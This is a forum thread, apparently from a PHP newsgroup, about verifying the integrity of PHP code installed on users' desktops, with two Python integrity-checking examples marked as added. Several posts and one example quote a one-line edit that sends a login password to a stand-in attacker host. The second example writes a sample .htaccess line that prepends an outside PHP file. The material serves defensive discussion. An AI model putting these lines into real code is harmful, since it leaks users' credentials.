Our app runs on end-users' machines (apache2.x + php5). At this moment
it is quite easy for someone (who has access to the console) to insert
a couple of lines of php code to steal sensitive info.
Is there a way to check the integrity of the php and javascript code by
using digital signatures/simple hash/etc.?
What do you do to verify that your code has not been changed by someone
else and everything is leaked to a rogue site?
Thanks for your help
-Han
Han wrote: Our app runs on end-users' machines (apache2.x + php5). At this moment it is quite easy for someone (who has access to the console) to insert a couple of lines of php code to steal sensitive info.
Is there a way to check the integrity of the php and javascript code by using digital signatures/simple hash/etc. ?
What do you do to verify that your code has not been changed by someone else and everything is leaked to a rogue site?
Thanks for your help -Han
The md5 of the files would change completely if it was tampered with at
all.
You can use the php 'md5_file("path/to/file")' function to check the
integrity of files through php.
hope this helps.
iwp
>Our app runs on end-users' machines (apache2.x + php5). At this moment it is quite easy for someone (who has access to the console) to insert a couple of lines of php code to steal sensitive info.
If you put sensitive info that you don't want end-users to see on
end-user machines, they don't have to "steal" it, you already gave
it to them.
And why would they need access to the console if they can log in
remotely?
Is there a way to check the integrity of the php and javascript code by using digital signatures/simple hash/etc. ?
Anyone modifying the code can simply see what the hash is on
unmodified code and then modify the code to always send that. Or
they can modify the code to do the hash on an unmodified copy which
is never run.
What do you do to verify that your code has not been changed by someone else and everything is leaked to a rogue site?
You can't. Remember, if the user can view your code on a display,
then someone can aim a webcam at that display and send it anywhere.
You could try using a tamper-proof smart card, but I don't know of any
of those with a graphical display or with networking capabilities.
Gordon L. Burditt
>> Our app runs on end-users' machines (apache2.x + php5). At this moment it is quite easy for someone (who has access to the console) to insert a couple of lines of php code to steal sensitive info.
Is there a way to check the integrity of the php and javascript code by using digital signatures/simple hash/etc. ?
What do you do to verify that your code has not been changed by someone else and everything is leaked to a rogue site?
Thanks for your help -Han
The md5 of the files would change completely if it was tampered with at all.
You can use the php 'md5_file("path/to/file")' function to check the integrity of files through php.
Until, of course, someone modifies their copy so that the path/to/file
points at an *unmodified* copy which is never run but is only used
to pass the integrity check.
Gordon L. Burditt
A simpler attack would be to disable that check.
I guess the solution has to be outside of php. I cannot figure out a
solution though.
-Han
Gordon Burditt wrote: Our app runs on end-users' machines (apache2.x + php5). At this moment it is quite easy for someone (who has access to the console) to insert a couple of lines of php code to steal sensitive info.
Is there a way to check the integrity of the php and javascript code by using digital signatures/simple hash/etc. ?
What do you do to verify that your code has not been changed by someone else and everything is leaked to a rogue site?
Thanks for your help -Han
The md5 of the files would change completely if it was tampered with at all.
You can use the php 'md5_file("path/to/file")' function to check the integrity of files through php.
Until, of course, someone modifies their copy so that the path/to/file points at an *unmodified* copy which is never run but is only used to pass the integrity check.
Gordon L. Burditt
We are not trying to hide sensitive data that belongs to us. The
sensitive info is the users' data (e.g., their passwords).
Are you saying that this is theoretically impossible? Then we should
just find a solution that makes the hacker's life more difficult.
We cannot be the first ones running into this problem. There must be a
solution that doesn't require tamper-proof smart cards.
Thanks
-Han
Han wrote: We are not trying to hide sensitive data that belongs to us. The sensitive info is the users' data (e.g., their passwords).
Don't store passwords. Problem solved.
Cheers,
Nicholas Sherlock
>We are not trying to hide sensitive data that belongs to us. The sensitive info is the users' data (e.g., their passwords).
Does the admin of the server on which the PHP code is running want
the check to work, or does he want to subvert it?
If it's a user's password, why is it in the PHP script (as distinguished
from a database)? Or are you talking about passwords users enter
into their clients to log in?
Are you saying that this is theoretically impossible? Then we should just find a solution that makes the hacker's life more difficult.
If the *SERVER ADMIN* is trying to compromise your code (e.g. it's
some kind of copy protection or licensing check), you don't have
much chance of stopping it. The same applies to a hacker who manages
to get root on the box and who spends enough time to understand the
problem. Pre-scripted attacks are much easier to stop. Another approach
is to put a key part of the operation of the system on a server *YOU*
control, so, for instance, if an activation key gets posted on the
Internet and is widely abused, you can deactivate it.
Doing something like opening the file $_SERVER['PHP_SELF'], computing
a checksum of it, and checking it against a known value is easily
defeated by a human who understands the code, but it will trip up
a virus that simply sticks logging code at the beginning of the
script to leak passwords to a remote (evil) system, at least until
your technique becomes so common that it's worth writing an attack
to defeat it. Oh, yes, you probably have to checksum all of the
file EXCEPT the part containing the 'correct answer', as computing
the checksum of the script when it already contains the answer you're
trying to compute is intentionally difficult, so you might checksum
all but the first line, and the first line is:
<?php $md5sum='a37862648cde79877987383992';
It would work better if you can introduce a system that can be
considered secure. For example, you don't just check the checksum
of the script *in the script*, you also output it to the browser
(perhaps hidden in a HTML comment). Your customer registers his
URL where he installs the script with you, and you poll them all,
verifying the checksum. If it changes, you raise an alarm. We're
assuming that the hacker can't get your customer's server and your
monitoring system at the same time, so replacing the 'correct answer'
is harder to do. Nagios is a nice monitoring system that can run
all sorts of periodic remote checks on your network (like that your
web server is up, that your cert is not expired, and you could do
just about any check on a web page returned that you can write a
script to verify).
We cannot be the first ones running into this problem. There must be a solution that doesn't require tamper-proof smart cards.
Tamper-proof smart cards are needed where the holder of the card wants
to cheat the system and there's enough monetary incentive for him
to use a lot of effort trying to do so. I originally thought this
was the situation you were describing, apparently I misinterpreted
what you wanted.
Gordon L. Burditt
Passwords are not stored in plaintext. However, still it's a 2 secs job
to change this line
if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
to
fopen('http://www.badhackerssite.com/'.$_REQUEST['pass'], "r");
if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
The admin password is leaked the next time user logs in.
[excuse the syntax errors]
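Gordon's "checksum all but the first line" self-check, Han's two-second leak edit against it, the re-stamp an informed attacker does, and the remote poll that still catches the re-stamp, as an added example that is not code from the thread. It is Python rather than PHP; the PHP script text, the admin hash and the `<!-- integrity:... -->` comment format are constructed for the example.

```python
"""
Added example (not from the thread): a first-line SHA-1 stamp on a PHP
script, the naive and informed ways of tampering with it, and the
off-box monitor that compares the published stamp with a registered one.
All PHP text below is constructed sample data.
"""
import hashlib
import re

STAMP_RE = re.compile(r"^<\?php \$sha1sum='([0-9a-f]{40})';\n")
PUBLISHED_RE = re.compile(r"<!-- integrity:([0-9a-f]{40}) -->")

# Constructed sample script; the first line is filled in by stamp().
ORIGINAL = (
    "<?php $sha1sum='unstamped';\n"
    "$adminpass = 'd033e22ae348aeb5660fc2140aec35850c4da997';\n"
    "if (strcmp(sha1('admin' . $_REQUEST['pass']), $adminpass)) {\n"
    "    die('bad password');\n"
    "}\n"
)
# The leak line from Han's post (hostname is the thread's placeholder).
LEAK = "fopen('http://www.badhackerssite.com/' . $_REQUEST['pass'], 'r');\n"


def body_digest(source: str) -> str:
    """SHA-1 of everything after the first line. The first line holds the
    expected value, so it cannot be part of what is hashed."""
    _first, _nl, rest = source.partition("\n")
    return hashlib.sha1(rest.encode()).hexdigest()


def stamp(source: str) -> str:
    """Install-time step: write the correct digest into the first line."""
    _first, _nl, rest = source.partition("\n")
    return f"<?php $sha1sum='{body_digest(source)}';\n" + rest


def stamp_value(source: str):
    """The digest the script claims for itself, or None if there is no stamp."""
    m = STAMP_RE.match(source)
    return m.group(1) if m else None


def self_check(source: str) -> bool:
    """What the script itself would do on every request."""
    return stamp_value(source) == body_digest(source)


def naive_injection(stamped: str) -> str:
    """Han's edit: a leak line inserted after the stamp line, stamp untouched."""
    first, _nl, rest = stamped.partition("\n")
    return first + "\n" + LEAK + rest


def informed_injection(stamped: str) -> str:
    """Gordon's objection: an attacker who reads the code re-stamps after editing."""
    return stamp(naive_injection(stamped))


def render_page(source: str) -> str:
    """The script publishes its stamp in an HTML comment for a remote poller
    (assumed format; the thread only says 'perhaps hidden in a HTML comment')."""
    return f"<!-- integrity:{stamp_value(source)} -->\n<html><body>login</body></html>\n"


def monitor_ok(html: str, registered: str) -> bool:
    """Remote monitor: compare the published digest with the value registered
    at install time, which an attacker on the customer's box cannot change."""
    m = PUBLISHED_RE.search(html)
    return bool(m) and m.group(1) == registered


if __name__ == "__main__":
    clean = stamp(ORIGINAL)
    registered = stamp_value(clean)
    print("clean script passes self-check:", self_check(clean))
    print("naive leak edit passes self-check:", self_check(naive_injection(clean)))
    restamped = informed_injection(clean)
    print("re-stamped leak edit passes self-check:", self_check(restamped))
    print("remote monitor accepts re-stamped script:",
          monitor_ok(render_page(restamped), registered))
```

The self-check stops the "stick a line at the top" edit and nothing more; the re-stamped copy passes it every time. Only the comparison against a value held off the machine (the `registered` digest) notices that the stamp itself has changed, and even that depends on the attacker not also being able to alter the record on the monitoring side.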
Nicholas Sherlock (n_********@hotmail.com) wrote:
: Han wrote:
: > We are not trying to hide sensitive data that belongs to us. The
: > sensitive info is the users' data (e.g., their passwords).
: Don't store passwords. Problem solved.
To be a little clearer, do not store unencrypted passwords, only store the
crypt or md5 checksum of a password.
Use two way encryption of important data like credit card numbers. If the
hardware is stolen then it is much harder to steal the data. If possible
require a person to enter the decrypt password for data. Either when the
system starts up so that the decrypted data is never available except
within the memory of the running computer after a bootup by an authorized
person (though the virtual memory paging file must be considered as well).
Or decrypt the data just as needed, where each set of data has a password
specific to what ever person is authorized to access that data.
Store important data on a "more secure" server (in this case - yours), and
access it through a VPN that requires a manual password.
Combine the two, so that (for example) a cronjob reads a hard coded
password but only via a secure (i.e. encrypted) link to another computer
at a different location.
However, if any person has access, either physical or remote login with
any privileges (intended or not) then the program and the data can never
be completely protected.
One very common strategy to solve this is to make the system and data
available only to people that are trusted. "trusted" actually means back
ground checks (criminal record checks etc), signed contracts, security
clearances, two key signins, etc etc. continual review of security
procedures and policies. (That is all the stuff that allow large
companies to charge outrageous prices.)
Another strategy used in some settings - the server hardware does not
belong to the customer. The seller (you in your example) still owns the
hardware. The customer has no privileged access, but does have physical
control of the box. You login remotely to do upgrades etc, or other
maintenance. They might control your remote access by physically
disconnecting your connection to the box, and possibly monitoring your
connection when you work on it (you'll need to use a challenge/response
login if they monitor your access).
--
This programmer available for rent.
>Does the admin of the server on which the PHP code is running want the check to work, or does he want to subvert it?
The admin (the user) wants the check to work.
We are trying to protect the user from the cleaning lady, daughter's
boyfriend, the intern, Trojan horses, etc.
If it's a user's password, why is it in the PHP script (as distinguished from a database)? Or are you talking about passwords users enter into their clients to log in?
I'm talking about the password that user enters to login.
Your md5 suggestion is doable.
Is there a way to force php interpreter to check it?
How do website admins currently make sure the php at their site has not
been changed by the interns, ISPs, programmers, consultants, etc.?
Is this an advantage of compiled code over interpreted code?
If yes, then I guess php was the wrong choice for writing code that
runs on desktop machines.
Thanks
-Han
Han wrote: How do website admins currently make sure the php at their site has not been changed by the interns, ISPs, programmers, consultants, etc.?
Don't give them the password.
Cheers,
Nicholas Sherlock
Han wrote: Our app runs on end-users' machines (apache2.x + php5). At this moment it is quite easy for someone (who has access to the console) to insert a couple of lines of php code to steal sensitive info.
Is there a way to check the integrity of the php and javascript code by using digital signatures/simple hash/etc. ?
What do you do to verify that your code has not been changed by someone else and everything is leaked to a rogue site?
Thanks for your help -Han
Normal security measures are often taken on the web server. They include:
- making php files "execute only", so it is very difficult to download
and investigate them.
- storing passwords, encrypted, somewhere outside of the public web
space. That makes them accessible for the server only. If you could
insert code, you would still need some inside info to find them.
Especially if the password file is called "packman.exe" instead of
"passwords.txt".
- allow uploading only on directories that do not have execute rights.
Of course, it does not remove the need for a PHP programmer to check the
URL request and the POST parameters for injections.
Best regards
Han (go********@safeblue.com) wrote:
: Passwords are not stored in plaintext. However, still it's a 2 secs job
: to change this line
: if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
: to
: fopen('http://www.badhackerssite.com/'.$_REQUEST['pass'], "r");
: if(strcmp(sha1('admin'.$_REQUEST['pass']),$adminpass)){
: The admin password is leaked the next time user logs in.
: [excuse the syntax errors]
It's only a 2 secs job if the computer is not secure. If you can't trust
the people with privileged passwords then you're stuck.
In that case, you may wish to have a second "more trusted" person to audit
the computer at random intervals using a check sum program to identify
changes and inspect them. (This is a good idea anyway to identify hacker
intrusions, and to catalog exactly when other changes occurred).
--
This programmer available for rent.
I see. The solution must be outside the realm of php.
In our case, this solution won't work as our program runs on the user's
desktop.
There is no trusted person (first or second).
- making php files "execute only or read only" seems to be a good
solution. Would that work on windows xp? Would this require ntfs?
Han wrote: - making php files "execute only or read only" seems to be a good solution. Would that work on windows xp? Would this require ntfs?
I am not a Windows XP expert, but you can probably do that. If you
switch on the Windows-NT-like authentication, you can define a user on
your system that will be used as the web user. After that, you configure
your webserver to use that user's privileges.
You can probably set general directory permissions from your web server
program as well.
Dikkie Dik (no****@nospam.org) wrote:
: Han wrote:
: > - making php files "execute only or read only" seems to be a good
: > solution. Would that work on windows xp? Would this require ntfs?
: >
: I am not a Windows XP expert, but you can probably do that. If you
: switch on the Windows-NT-like authentication, you can define a user on
: your system that will be used as the web user. After that, you configure
: your webserver to use that user's privileges.
: You can probably set general directoy permissions from your web server
: program as well.
Ah yes, but which person is he going to trust to set that up? Apparently
there is no trusted user at the computer.
Also, yes, xp can certainly do that sort of security with ntfs (which is
the default file system by the way) - but beware of XP home. The default
security settings are that an account is either non-priv or priv, and
since many things like games (from MS even) require priv's, you're liable
to have (or end up with) numerous priv accounts on an xp home machine.
Those priv account holders can do anything if they set their minds to it.
(Perhaps xp home edition can change that aspect of how it works, no idea,
but you still have to have someone you trust to do that.)
--
This programmer available for rent.
After long discussions here and through the help of the people in this
board as well, here is what we are going to do. I hope this helps other
people who would deploy a php based solution at users' desktops.
1. We'll make the files read-only (execute-only won't work, right?)
2. We'll move all password related questions to compiled code
(C/C++). We'll make this non-browser based, so the user is not subject
to a simple phishing attack.
3. At the time when the password is asked (before or after), the
compiled code will go over the php installation and check the md5 (or
sha1) of all the php/javascript code.
4. If there is no mismatch, the password is passed to php
There is only one question we couldn't answer at this moment, which is
the following: which files do we need to check?
Is PHP monotonic? By that we mean, does adding a file to a directory
change the behavior of php? If the compiled program checks only the
files we created (php/javascript), is it possible for someone to insert
a file in our directory to change the behavior of php? Is there a file
that I can create that redirects php to a different directory?
>After long discussions here and through the help of the people in this board as well, here is what we are going to do. I hope this helps other people who would deploy a php based solution at users' desktops.
1. We'll make the files read-only (execute-only won't work, right?)
If you make it execute-only, PHP can't read it (the same issue
applies to shell scripts and other interpreted languages).
Ideally the files should be owned by a user *other* than the one
that Apache/PHP runs as, so a hole in Apache or PHP still won't
let them change the permissions on the files.
2. We'll move all password related questions to compiled code (C/C++). We'll make this non-browser based, so the user is not subject to a simple phishing attack. 3. At the time when the password is asked (before or after), the compiled code will go over the php installation and check the md5 (or sha1) of all the php/javascript code. 4. If there is no mismatch, the password is passed to php
There is only one question we couldn't answer at this moment, which is the following: which files do we need to check?
Is PHP monotonic? By that we mean, does adding a file to a directory change the behavior of php? If the compiled program checks only the files we created (php/javascript), is it possible for someone to insert a file in our directory to change the behavior of php? Is there a file that I can create that redirects php to a different directory?
PHP uses an include search path. If you add a file being searched
for to a directory earlier on the search path, you get that file
instead of the one you otherwise would have gotten. This might
cause problems.
The Apache config file can change the document root directory for
a site, and it can change some of the parameters for PHP. This
file also tends to get tinkered with a lot. Some systems I administer
generate it from a database every half an hour (provisioning code
that adds/removes virtualhosts), and it might really change a few
times a week.
php.ini is also critical. Under some circumstances, which may
vary with your Apache config file, a .htaccess file can change
PHP parameters, including whether .php files are interpreted
as PHP or something else.
Gordon L. Burditt
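An out-of-tree checker of the kind Han's step 3 calls for, as an added example that is not code from the thread and is Python rather than the C/C++ Han plans. It answers Han's "monotonic" question the way Gordon does: the manifest covers every file under the install root, not only the shipped .php/.js files, so a dropped-in .htaccess or a shadowing include shows up as unexpected. The sample install, the leak edit and the .htaccess line are constructed; a real deployment would also have to cover httpd.conf and php.ini, which sit outside the install root, and keep the manifest where the checker's host does not expose it (in Han's design, inside the compiled binary).

```python
"""
Added example (not from the thread): build a digest manifest of a PHP
install, then report modified, missing and unexpected files. The sample
tree and the tampering steps are constructed for the example.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def file_digest(path: Path) -> str:
    """SHA-256 of a file, streamed so large files are not read at once."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map every regular file under root (relative POSIX path) to its digest.
    Every file is included, whatever its extension, so additions are caught."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            manifest[p.relative_to(root).as_posix()] = file_digest(p)
    return manifest


def verify_tree(root: Path, manifest: dict) -> dict:
    """Compare the tree with the manifest. Any non-empty list is a failure:
    'unexpected' is the case Han asked about (a file added to the directory)."""
    current = build_manifest(root)
    return {
        "modified": sorted(k for k in manifest if k in current and current[k] != manifest[k]),
        "missing": sorted(k for k in manifest if k not in current),
        "unexpected": sorted(k for k in current if k not in manifest),
    }


def tree_is_clean(report: dict) -> bool:
    return not any(report.values())


# Constructed sample install; the PHP/JS content is illustrative only.
SAMPLE_FILES = {
    "index.php": "<?php require 'lib/auth.php'; check_login($_REQUEST['pass']);\n",
    "lib/auth.php": "<?php function check_login($p) { return sha1('admin' . $p) === ADMIN_HASH; }\n",
    "js/app.js": "document.forms[0].addEventListener('submit', () => {});\n",
}


def write_tree(root: Path, files: dict) -> None:
    for rel, text in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(text)


def demo() -> tuple:
    """Take a manifest of a clean install, then apply three changes: Han's
    leak edit, a dropped-in .htaccess that changes PHP settings (a directive
    Gordon warns about; the path is made up), and a deleted file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        write_tree(root, SAMPLE_FILES)
        manifest = build_manifest(root)  # in Han's design this lives inside the checker binary
        before = verify_tree(root, manifest)

        leak = "fopen('http://www.badhackerssite.com/' . $p, 'r'); "
        auth = root / "lib/auth.php"
        auth.write_text(auth.read_text().replace("{ return", "{ " + leak + "return"))
        (root / ".htaccess").write_text("php_value auto_prepend_file /tmp/evil.php\n")
        (root / "js/app.js").unlink()
        after = verify_tree(root, manifest)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("clean install:", before)
    print("after tampering:", after)
```

The checker is only as trustworthy as the place the manifest and the checker itself live: on the same box, under the same account, an attacker edits both. Han's plan keeps them in a separate compiled program, which raises the effort needed but, as the thread says, does not make the check impossible to remove.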
Han wrote: Our app runs on end-users' machines (apache2.x + php5). At this moment it is quite easy for someone (who has access to the console) to insert a couple of lines of php code to steal sensitive info.
Is there a way to check the integrity of the php and javascript code by using digital signatures/simple hash/etc. ?
What do you do to verify that your code has not been changed by someone else and everything is leaked to a rogue site?
Thanks for your help -Han
Use ZEND Optimizer to encode it...?
Following on from Han's message. . . Our app runs on end-users' machines (apache2.x + php5). At this moment it is quite easy for someone (who has access to the console) to insert a couple of lines of php code to steal sensitive info.
Is there a way to check the integrity of the php and javascript code by using digital signatures/simple hash/etc. ?
What do you do to verify that your code has not been changed by someone else and everything is leaked to a rogue site?
Thanks for your help -Han
There are four issues which will have varying importance for you.
1 Detecting an intrusion/abnormal activity/ code change
2 Preventing an intrusion/abnormal activity/ code change
3 Verifying the /system/ does what it is supposed to
4 Preventing information leaks
These are very different things but need to be considered together.
Example: You have a program that through some magic sets off an alarm
when it is tampered with or used by an unauthorised person. Job done?
No.
Mr. Blackhat takes a copy and disassembles it in his workshop,
neutralises the alarms and modifies the code (which might be accessing
the database say) for his own purposes. Then he runs the copy as a
separate program and has cracked open the database or establishes a fake
trust or whatever. The original program is running perfectly smoothly
and you may never know all your doors are being unlocked by a duplicate
key. (Oh and Mr. Blackhat is not a terrorist or industrial spy but a
disgruntled employee who only wants to change the master password so
your data is inaccessible.)
A book could be written on the subject.
It has been written on the subject:
Security Engineering by Ross Anderson pub. Wiley.
It does deal a bit with technology and privacy and methods, but the
really important message is that you need to start with a threat model
and develop a set of methods for dealing with those threats... ...but
don't expect anything to be watertight. The two classic mistakes are
protecting the wrong thing from the wrong people and /relying on/
security by obscurity. This book is excellent because it makes security
*interesting* and so there's more hope that people will make the effort
to study it, keep up with state of the black art and recognise that it
needs investment.
--
PETER FOX Not the same since the icecream business was liquidated pe******@eminent.demon.co.uk.not.this.bit.no.html
2 Tees Close, Witham, Essex.
Gravity beer in Essex <http://www.eminent.demon.co.uk>
Han wrote: Our app runs on end-users' machines (apache2.x + php5). At this moment it is quite easy for someone (who has access to the console) to insert a couple of lines of php code to steal sensitive info.
Is there a way to check the integrity of the php and javascript code by using digital signatures/simple hash/etc. ?
What do you do to verify that your code has not been changed by someone else and everything is leaked to a rogue site?
The only way to secure this is to not put the program on the enduser
machines. Make it a proper client server app. Have the PHP on the
server only and properly secured.
You _might_ be able to secure some of the data if it's in a SQL database
and you set the permissions so that sensitive data can never be
retrieved with the username/password used to access the database. In
fact, you should be doing this even if the program is running on the
server side.
And no, a compiled program won't actually improve your security. Your
problem isn't in the type of program being executed. Your problem is
your complete lack of a proper security model.
--
Rossz
God kills a kitten each time someone uses Internet Explorer